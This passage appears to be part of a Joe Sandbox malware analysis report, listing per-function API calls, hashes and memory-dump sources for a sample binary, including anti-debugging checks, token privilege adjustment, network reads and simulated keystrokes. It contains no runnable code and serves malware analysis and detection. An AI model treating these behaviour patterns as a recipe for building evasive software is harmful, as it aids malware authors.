                                          • Instruction ID: 2d8f3c3ecfad7c31784d8087dade4d7c92fd67736f94431bb4c98fc56a59922c
                                          • Opcode Fuzzy Hash: 5a9c2462101e06a0ae1594722ff01e83c2344e1124dba40515f6a2633883d44c
                                          • Instruction Fuzzy Hash: 83312B30A40308AEEB308A65CC05BFA77E6AB4E314F18622AE0817A1D1D374A985C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00EBCE89
                                          • GetLastError.KERNEL32 ref: 00EBCEEA
                                          • SetEvent.KERNEL32 ref: 00EBCEFE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorEventFileInternetLastRead
                                          • String ID:
                                          • API String ID: 234945975-0
                                          • Opcode ID: 4a311c68a04f32f3305159b6fa8630cd0b236a57b5d21a865057a4eabdbb65e9
                                          • Instruction ID: 604334c2866849024459bec55f17169701b04b29556e9b6a7e0d2b70db844d2b
                                          • Opcode Fuzzy Hash: 4a311c68a04f32f3305159b6fa8630cd0b236a57b5d21a865057a4eabdbb65e9
                                          • Instruction Fuzzy Hash: 7D21AC71608706DFDB209FA5E948BA777F8EB00358F20541AE646E2151E770EA08CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: c42473130eb4d541fc7d77bcd6af4d1fa4c3bc116e471ce00b5f8c73e54cb07a
                                          • Instruction ID: a4323a4e47fdb3d6ebcc9c043bafdae6fcd56d01f9ed86c09140408016711286
                                          • Opcode Fuzzy Hash: c42473130eb4d541fc7d77bcd6af4d1fa4c3bc116e471ce00b5f8c73e54cb07a
                                          • Instruction Fuzzy Hash: CA323574A007059FCB28CF59C581AAAB7F0FF48714B15D56EE49AEB3A1EB70E941CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 00E7271A
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00E72724
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00E72731
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 54fd4f21b4f81ae6a2d426225aa8dcc6de1ea72e5210a0badfffee44c5461969
                                          • Instruction ID: c5c1d3c0dd03271da6c693d085602d89b81c3d34c122a858ffbc33d01a3db0fe
                                          • Opcode Fuzzy Hash: 54fd4f21b4f81ae6a2d426225aa8dcc6de1ea72e5210a0badfffee44c5461969
                                          • Instruction Fuzzy Hash: 7C31D574D5122D9BCB21DF68DD8879DB7B8AF08350F5052EAE91CA7260E7309F858F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB51DA
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EB5238
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB52A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 26b6c16d751b8bee3c797ba98abdf866d9a36a3524e3462942f80fbf32e2d7c1
                                          • Instruction ID: f4924257ee179838f7c612a5fe09ec43a6d601e6c709565d2b84f9870286c2b1
                                          • Opcode Fuzzy Hash: 26b6c16d751b8bee3c797ba98abdf866d9a36a3524e3462942f80fbf32e2d7c1
                                          • Instruction Fuzzy Hash: 9D316B35A00518DFDB00DF54D884EAEBBF4FF09318F188099E805AB362CB35E84ACB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E60668
                                            • Part of subcall function 00E5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E60685
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                          • GetLastError.KERNEL32 ref: 00EA174A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                          • String ID:
                                          • API String ID: 577356006-0
                                          • Opcode ID: 127a04a02964556e068a0e3a2fddfe0c9185908788d7d12f13ce31f7538e7066
                                          • Instruction ID: 8038ef606234dc1b52faec3812050c316e9181108154f33cfd3d4bca9287e245
                                          • Opcode Fuzzy Hash: 127a04a02964556e068a0e3a2fddfe0c9185908788d7d12f13ce31f7538e7066
                                          • Instruction Fuzzy Hash: A31101B2400305AFD7189F54EC86E6AB7F8EB09754B20856EF446A7241EB70BC45CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EAD608
                                          • DeviceIoControl.KERNEL32 ref: 00EAD645
                                          • CloseHandle.KERNEL32(?), ref: 00EAD650
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID:
                                          • API String ID: 33631002-0
                                          • Opcode ID: 2a077ebed2c4fa12a5f73b5384bd9e3711aeb6d98e78a61ca2c26c6f3db14f91
                                          • Instruction ID: 0da9eaed6b0fcae0cc36905c788bf1643e9f474e1db81ce83e2d5757476e2500
                                          • Opcode Fuzzy Hash: 2a077ebed2c4fa12a5f73b5384bd9e3711aeb6d98e78a61ca2c26c6f3db14f91
                                          • Instruction Fuzzy Hash: 39118EB1E05228BFDB108F95EC44FAFBBBCEB49B50F108152F904F7290C2705A058BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32 ref: 00EA168C
                                          • CheckTokenMembership.ADVAPI32 ref: 00EA16A1
                                          • FreeSid.ADVAPI32(?), ref: 00EA16B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 5dbb4ad850b4aef1ba3818db497cb15726fe71f75ae37a5bfd20f1b8d85922af
                                          • Instruction ID: 2b7d307d7313f5549cb8882c87bef58c4204d0e4dddeee5cede7daeb92e2e947
                                          • Opcode Fuzzy Hash: 5dbb4ad850b4aef1ba3818db497cb15726fe71f75ae37a5bfd20f1b8d85922af
                                          • Instruction Fuzzy Hash: 92F0F471951309FFDF00DFE59C89AAEBBBCEB08644F5045A5E501E2181E774AA489A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /
                                          • API String ID: 0-2043925204
                                          • Opcode ID: 561bdaf90c47cd2f9675434f6d0b6d60b7e066e40315193f09fd5e535feb8bda
                                          • Instruction ID: 288e1503de583aee8c9262c994d069ec2df7083c012322ee2ac499d1be08a592
                                          • Opcode Fuzzy Hash: 561bdaf90c47cd2f9675434f6d0b6d60b7e066e40315193f09fd5e535feb8bda
                                          • Instruction Fuzzy Hash: 2A413A725006197FCB209FB9DC48DAB77BCEB84358F2092ADF919E7180E6309D41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E9D28C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID: X64
                                          • API String ID: 2645101109-893830106
                                          • Opcode ID: 127c0c3e2e492691856ebedaf245c628a6d0ca614bd562e6ee2c1ea1621d90e0
                                          • Instruction ID: 69e81a45222168db081b3cce7d3a7c486d2f104dfd537e7d85ea7d160790bab5
                                          • Opcode Fuzzy Hash: 127c0c3e2e492691856ebedaf245c628a6d0ca614bd562e6ee2c1ea1621d90e0
                                          • Instruction Fuzzy Hash: 48D0C9B480512DEECF90CB90EC88DD9B37CFB04345F100552F506B2080D73095488F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                          • Instruction ID: f745cfb2b28293938f5a0d7ca4c6ebeac9b6fe71a102a0967cc08f798c8dd093
                                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                          • Instruction Fuzzy Hash: 2F023B71E402199BDF14CFA9D8806ADFBF1EF88354F25916AD859FB380D731AA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB6918
                                          • FindClose.KERNEL32(00000000), ref: 00EB6961
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: be000ff2110ff5b5e99c25d3c4690137ea75d5167baecfd13597eb7bf1aeb489
                                          • Instruction ID: af807acd4400e3ac72f522a9ed71dcc7d5735fcdecb7c4dc90e5a09430fe4113
                                          • Opcode Fuzzy Hash: be000ff2110ff5b5e99c25d3c4690137ea75d5167baecfd13597eb7bf1aeb489
                                          • Instruction Fuzzy Hash: 9B11E2316046019FC710CF29D484A16BBE1FF84328F14C699F8699F7A2C734EC05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: bcb37172e9eaea9b52ff33dce189676370754b763500dbecb73dba15d283f60f
                                          • Instruction ID: 584da97fcfaef2656eecd55635d0db2d2e61d23699d3bfb2fcdd126aa33abf65
                                          • Opcode Fuzzy Hash: bcb37172e9eaea9b52ff33dce189676370754b763500dbecb73dba15d283f60f
                                          • Instruction Fuzzy Hash: 60F0EC707052356AD71017B66C4DFDB779DEFC4761F100166F509F2191D9605904C7B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAB25D
                                          • keybd_event.USER32 ref: 00EAB270
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 131b2d1f9c689ffc3f1755cefac5018edd2efba88b509b9a8f17a2654ab7ae37
                                          • Instruction ID: f100df0233d6cb4157fc50c658961a1c90523dd702393bc27f4870fa254b78ab
                                          • Opcode Fuzzy Hash: 131b2d1f9c689ffc3f1755cefac5018edd2efba88b509b9a8f17a2654ab7ae37
                                          • Instruction Fuzzy Hash: D9F06D7080424EAFDB058FA1D805BEE7BB4FF08309F10804AF951A91A2C3799205DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00EA10D4
                                          • CloseHandle.KERNEL32(?), ref: 00EA10E9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 4f1a1be73be673c7cc6b5be835f4cc651c876a44ed645dd660d5cedae5983146
                                          • Instruction ID: 0d29c5fde237f6591117c915852a5adc3110294861df175df5346124028f6932
                                          • Opcode Fuzzy Hash: 4f1a1be73be673c7cc6b5be835f4cc651c876a44ed645dd660d5cedae5983146
                                          • Instruction Fuzzy Hash: 04E04F32008601AEE7252B11FC06F7377E9EB04321F20882EF9A5904B1DB626C94DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                          Download Yara Rule
                                          Strings
                                          • Variable is not of type 'Object'., xrefs: 00E90C40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable is not of type 'Object'.
                                          • API String ID: 0-1840281001
                                          • Opcode ID: 2e5ee6b43ee8acbc7cd6757aeb92892937420d21b40da9b904172e2a324a2b07
                                          • Instruction ID: 3895e5ae798c2d95135c5af48b799497c9a463ae74e532670823b01b8408a686
                                          • Opcode Fuzzy Hash: 2e5ee6b43ee8acbc7cd6757aeb92892937420d21b40da9b904172e2a324a2b07
                                          • Instruction Fuzzy Hash: 4D328C70A01218DFCF54DF90E881AEDB7F5BF04308F646069E806BB292D775AE49CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 00E76998
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: c4e062eb8f3ef88bf291c4039619f478634e0f4db52d0be5de11fc8545ebe67c
                                          • Instruction ID: 288c9deec47d916d0f88ff407f3ef69113f65278fb31594c8d494ade3caa8b58
                                          • Opcode Fuzzy Hash: c4e062eb8f3ef88bf291c4039619f478634e0f4db52d0be5de11fc8545ebe67c
                                          • Instruction Fuzzy Hash: D1B15A31510A099FEB19CF28C486BA47BA0FF4536CF25D658E99DDF2A2C335D985CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 27f27ef3bcaffaea332546f642ab64086685eae004bac4d2db74eede92c3336a
                                          • Instruction ID: 66d51a5b02c6600f08322ad3bf127e337dbbadeda0578f60d534046f4f0728a4
                                          • Opcode Fuzzy Hash: 27f27ef3bcaffaea332546f642ab64086685eae004bac4d2db74eede92c3336a
                                          • Instruction Fuzzy Hash: 65125E719002299FCF24CF58C9806EEB7F5FF48710F1495AAE849FB251EB309A85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
